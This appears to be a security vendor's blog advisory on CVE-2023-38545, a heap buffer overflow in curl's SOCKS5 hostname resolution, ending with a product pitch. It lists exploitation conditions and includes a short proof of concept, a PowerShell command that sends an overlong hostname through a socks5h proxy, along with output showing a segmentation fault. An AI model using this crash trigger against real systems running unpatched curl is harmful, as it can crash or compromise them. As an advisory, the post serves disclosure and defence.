October 11, 2023

Blog

CVE-2023-38545 (curl heap buffer overflow)

The maintainers of the widely used libcurl library have recently disclosed two vulnerabilities that impact versions 7.69.0 to 8.3.0. Of these vulnerabilities, one is rated as having a high severity level and has been described by the maintainers themselves as "probably the worst curl security flaw in a long time." It is essential to note that curl is a command-line tool extensively relied upon by numerous applications for their core functionality. Both curl and libcurl are affected by this high-severity vulnerability, and patches have been promptly made available on the official curl website and through the various Linux distributions.

When used with a specific command-line flag, exploitation of the high-severity vulnerability involves a heap-based buffer overflow within the process of resolving hostnames during the SOCKS5 handshake. This vulnerability arises from curl switching to a local resolve mode when encountering overly long hostnames, specifically, those whose length is greater than 255 bytes. However, successful exploitation of this vulnerability requires certain conditions and prerequisites to be met:

  1. The attacker must have the capability to direct curl towards a server under their control.
  2. Curl must be configured to use a SOCKS5 proxy in proxy-resolver mode.
  3. Curl must be set to automatically follow redirects.
  4. In applications using libcurl, an overflow is only possible if CURLOPT_BUFFERSIZE is not set or set to a value smaller than 65541. By default, curl sets CURLOPT_BUFFERSIZE to 100kB, making it non-vulnerable in its default configuration.
  5. The SOCKS5 handshake must be "slow enough" to trigger the local variable bug, though the precise definition of "slow enough" remains unspecified. However, it's noted that typical server latency is likely to be slow enough to trigger the local variable bug.

This vulnerability primarily affects applications that rely on curl for SOCKS5 proxy communication, especially when the CURLOPT_PROXYTYPE is set to CURLPROXY_SOCKS5_HOSTNAME or when the proxy is configured using schemes like socks5h://.

Despite the severity of this vulnerability, several factors mitigate its widespread exploitation. Modern memory protection mechanisms add an additional layer of defense, and attackers must first identify a specific attack surface that exposes curl in a vulnerable manner. As a result, the likelihood of widespread mass exploitation is thought to be low.

Proof of Concept:

PS > $payload = 'A' * 10000
PS > curl.exe -v -x socks5h://127.0.0.1:9050 $payload

* Trying ::1:9050...
* connect to ::1 port 9050 failed: Connection refused
* Trying 127.0.0.1:9050...
* SOCKS5: server resolving disabled for hostnames of length > 255 [actual len=10000]
* SOCKS5 connect to
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AA...
* Send failure: Bad file descriptor
* Failed to send SOCKS5 connect request.
Segmentation fault (core dumped)

Validating protection against vulnerability exploitation is important. When it comes to security testing and control validation, our belief is that testing should be done at scale, in production environments, continuously. To learn more about production scale continuous security testing, check out our white paper: An Argument for CST.

References:

https://curl.se/docs/CVE-2023-38545.html

https://daniel.haxx.se/blog/2023/10/11/curl-8-4-0/
https://github.com/curl/curl/commit/fb4415d8aee6c1

https://gist.github.com/xen0bit/0dccb11605abbeb6021963e2b1a811d3?permalink_comment_id=4721278

https://twitter.com/_JohnHammond/status/1711913166165463220

See the only production-scale detection and response platform first-hand

Book time with our team to see Prelude can help you create actionable threat intelligence, surface better detections, and remediate threats at scale.

Book Your Demo
Defences to Protect You